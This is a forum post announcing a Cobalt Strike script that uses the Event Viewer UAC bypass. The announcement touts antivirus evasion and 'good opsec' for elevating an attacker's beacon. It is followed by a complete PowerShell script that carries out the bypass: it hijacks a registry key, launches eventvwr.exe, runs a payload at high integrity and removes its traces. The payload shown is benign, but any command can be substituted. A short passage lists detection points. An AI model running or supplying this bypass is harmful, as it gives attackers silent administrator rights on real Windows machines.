Admin-Ahead Community

Windows => General Windows => Topic started by: sujitht on September 28, 2017, 11:30:51 pm

Title: Eventvwr File-less UAC Bypass CNA
Post by: sujitht on September 28, 2017, 11:30:51 pm
(https://snag.gy/wt7WUr.jpg)
Matt Nelson recently released a very useful, file-less UAC bypass using Event Viewer which was quickly implemented into a Metasploit module by @TheColonial. Following this, we decided to release our own implementation in the form of a Cobalt Strike CNA script. The current default UAC bypass in Cobalt Strike requires DLL hijacking and drops a temporary DLL artefact to disk, as shown in the following:
(https://snag.gy/cfzqgr.jpg)
Bypassuac-eventvwr was created as a way to easily utilise the EventVwr UAC bypass technique and maintain good opsec practices by not touching disk. This method does not require writing to disk and therefore should be AV-friendly.
The CNA script currently performs the following:

    Write registry path hijack
    Execute eventvwr.exe
    When eventvwr.exe executes, the hijack will be called
    If SMB is used, linking is performed to the new beacon
    Delete registry path hijack
    Enjoy elevated beacon
An example usage is shown below:
(https://snag.gy/WfYZXy.jpg)
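The step list in the post maps onto a short PowerShell sequence. The script below is an added example for this page, not the CNA script or any code from the original post: it performs the same write-hijack, run-eventvwr, clean-up steps (the Beacon-specific SMB linking is omitted) with a harmless payload that records its own integrity level so the result can be checked. The hijacked key, HKCU\Software\Classes\mscfile\shell\open\command, is the one the Event Viewer technique relies on; the scratch key HKCU\Software\EventvwrCheck and the variable names are this example's own. It assumes a medium-integrity shell belonging to a local administrator with default UAC settings, on a Windows build where eventvwr.exe still consults the HKCU association (newer Windows 10 builds changed this, in which case the check reports failure).

```powershell
# Added example: file-less Event Viewer UAC bypass, step by step.
# Not the post's CNA script. Payload only records its integrity level.

$hijackKey = 'HKCU:\Software\Classes\mscfile\shell\open\command'   # key eventvwr.exe consults
$checkKey  = 'HKCU:\Software\EventvwrCheck'                         # scratch key (this example's own)

# Payload: a hidden PowerShell that stores its "Mandatory Label" line under $checkKey.
# The trailing "#" turns any file path the shell appends to the command into a comment.
$payload = 'powershell.exe -NoProfile -WindowStyle Hidden -Command "New-Item -Path HKCU:\Software\EventvwrCheck -Force | Out-Null; Set-ItemProperty -Path HKCU:\Software\EventvwrCheck -Name Label -Value (whoami /groups | findstr Mandatory); #"'

Remove-Item -Path $checkKey -Recurse -Force -ErrorAction SilentlyContinue

# Step 1: write the registry path hijack (HKCU is user-writable, so no prompt, nothing on disk).
New-Item -Path $hijackKey -Force | Out-Null
Set-ItemProperty -Path $hijackKey -Name '(default)' -Value $payload

$proc = $null
try {
    # Step 2/3: execute eventvwr.exe; it auto-elevates and, when opening its .msc,
    # resolves mscfile\shell\open\command under HKCU first, so the payload runs elevated.
    $proc = Start-Process -FilePath "$env:SystemRoot\System32\eventvwr.exe" -PassThru

    # Wait (up to 10 s) for the payload to leave its mark.
    $deadline = (Get-Date).AddSeconds(10)
    while (-not (Test-Path $checkKey) -and (Get-Date) -lt $deadline) {
        Start-Sleep -Milliseconds 500
    }
}
finally {
    # Step 5: delete the hijack even if something above failed. A leftover key is both
    # an opsec tell and a way for any later .msc launch to run the payload again.
    Remove-Item -Path 'HKCU:\Software\Classes\mscfile' -Recurse -Force -ErrorAction SilentlyContinue
    if ($proc -and -not $proc.HasExited) {
        Stop-Process -Id $proc.Id -ErrorAction SilentlyContinue
    }
}

# Step 6: verify that the payload ran at high integrity.
if (Test-Path $checkKey) {
    $label = (Get-ItemProperty -Path $checkKey -Name Label).Label
    if ($label -match 'High Mandatory Level') {
        Write-Host "[+] Payload ran elevated: $label"
    } else {
        Write-Host "[-] Payload ran but was not elevated: $label"
    }
    Remove-Item -Path $checkKey -Recurse -Force
} else {
    Write-Host '[-] Hijack did not fire (patched build, UAC set to always notify or disabled, or not a local admin).'
}
```

Because the only artefacts are two HKCU registry writes and an eventvwr.exe launch, the corresponding detection opportunities are a registry value set under any user's Software\Classes\mscfile\shell\open\command (Sysmon Event ID 13 covers this) and eventvwr.exe spawning a child process other than mmc.exe.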